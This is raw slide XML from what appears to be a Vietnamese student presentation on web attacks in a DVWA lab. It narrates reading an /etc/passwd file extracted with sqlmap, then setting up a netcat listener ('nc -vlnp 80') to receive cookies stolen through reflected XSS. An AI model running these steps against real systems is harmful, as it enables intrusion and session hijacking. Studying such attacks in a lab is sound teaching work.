        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>
            <a:ext cx="8915400" cy="3080329"/>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Xác minh và được File /etc/password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>truy cập thư mục output của sqlmap và đọc nội dung file đã trích xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>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Mục đích </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là chứng minh rằng file hệ thống nhạy cảm của Target Server đã thực sự được tải về máy Attacker</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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ử dụng lệnh.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2E4409C-F499-75B3-68E0-3528F768E785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="370841" y="3543300"/>
            <a:ext cx="8646159" cy="561439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35509211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03A4B-6420-57C1-8417-565D97401C9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252179E-E654-37A3-7D05-46607B059C0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54890F1C-2254-010E-B2F4-6B390F61B3E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144</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00688ECA-9E87-7FA7-5D15-B2234C929896}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Tiếp theo, lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ls -l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>được chạy để liệt kê nội dung thư mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cho thấy sự tồn tại của các thư mục quan trọng như dump </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D24C99DA-208D-C283-C764-C6290706D240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2019300" y="1289054"/>
            <a:ext cx="7124700" cy="4343632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160100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6D90F-4EE9-1659-281B-DDAF7F58AEE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EB07FE2-7140-CC2B-7993-0411D8683B2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DFD902E8-CAE4-3B60-A7E8-9258C815005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145</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00064B46-7BF3-9EB6-4DB0-BA89BB5B2835}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="211888"/>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Việc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xuất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>minh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nội</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> dung file /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>bằng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chứng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>trọng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A17E55-4524-9AF7-5015-0F7D8F643787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1812925" y="1214974"/>
            <a:ext cx="5518150" cy="4498558"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17969831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93BD-7001-4B3B-8430-D5F90378CB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6BA14F9-9E4A-0D5C-C0FE-1EC4911340C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3016DEC8-D70B-C2CB-DD0C-6EAC3BC98DB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="298037"/>
            <a:ext cx="9029700" cy="2598147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.2.	Tấn công Cross-Site Scripting (XSS) </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>3.3.2.1.	Tấn công Cross-Site Scripting (XSS) cơ bản với DVWA.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B271A6-9D9D-A2D9-2E9B-7A958462AF85}"/>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146</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A245236-2662-6FDB-3E22-6F9BCD756969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2900891"/>
            <a:ext cx="8915400" cy="251607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DVWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là một dịch vụ web có hỗ trợ lỗ hổng để tấn công XSS cụ thể ở demo này ta sử dựng XSS reflectted.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Kỹ thuật này được thực hiện nhằm chứng minh khả năng tiêm mã độc Client-Side để đánh cắp Session Cookie của người dùng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33581903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5ACA6-0AF1-0696-C611-81833F57974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BF64B1D-90E5-44E3-C9BF-6B24DC3B8A2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48912682-62AE-3B47-E643-CDEE7EC2727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147</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612A540-0AAF-58BB-CE60-AF74749735DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="287514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Trước khi tiêm mã độc la hành động tấn công nghe lén  (Attacker Listener), Attacker cần thiết lập một Listener (máy chủ nghe lén) trên máy Kali Linux (192.168.164.128) để nhận Cookie bị đánh cắp. Attacker chạy lệnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1"/>
              <a:t>vlnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0"/>
              <a:t> 80</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6513732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4ABF1-4270-3510-257A-1AA8E44BE4E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DAB87A9-70BC-0080-270A-AB36B979659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B97F77F3-1630-5B06-E9BF-FB3D5CD5E37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148</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC6FD296-4C9E-C27C-EFC3-1FD3E4DB6267}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Lệnh này được sử dụng để khởi động công cụ Netcat với các tham số: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-v (verbose), -l (listen), -n (numeric IP only), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> -p (port 80)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCCA0A46-75A7-D181-E234-A538339ED370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231900" y="1800590"/>
            <a:ext cx="6680200" cy="3901710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9059489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57C43-F2E6-ED3B-2BC7-C9848EC61A6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865CF43-3B69-00BD-DC48-057AC9A21EE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8FF93296-0EF3-CF79-468D-A6608BFC779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149</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6756B929-2405-95E1-2BBD-D15D1D9E3EA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>
            <a:ext cx="8915400" cy="1592743"/>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Tiến hành tiêm Payload (Payload Injection). Trong trường nhập liệu của XSS Reflected trên DVWA</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Nội dụng  payload như sau:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4012F879-7FDD-33DA-0984-6D6B04C6D3F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2055270"/>
            <a:ext cx="8077200" cy="1440798"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2182941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48ABC-EA44-CC2E-EAAA-3B4C2641374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B115EEB-2FB4-E91B-5586-F5C60ABDCD14}"/>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490BE25-811A-B599-EF29-0C580D5E3E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="3244478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>1.3. Tổng quan về các lỗ ổng bảo mật Web phổ biến</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="vi-VN" spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9626FB9-B75F-A3B0-1A4A-675F75473A5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a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E288075F-C021-ED69-D50F-C831AD5B32C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="557083" y="2260613"/>
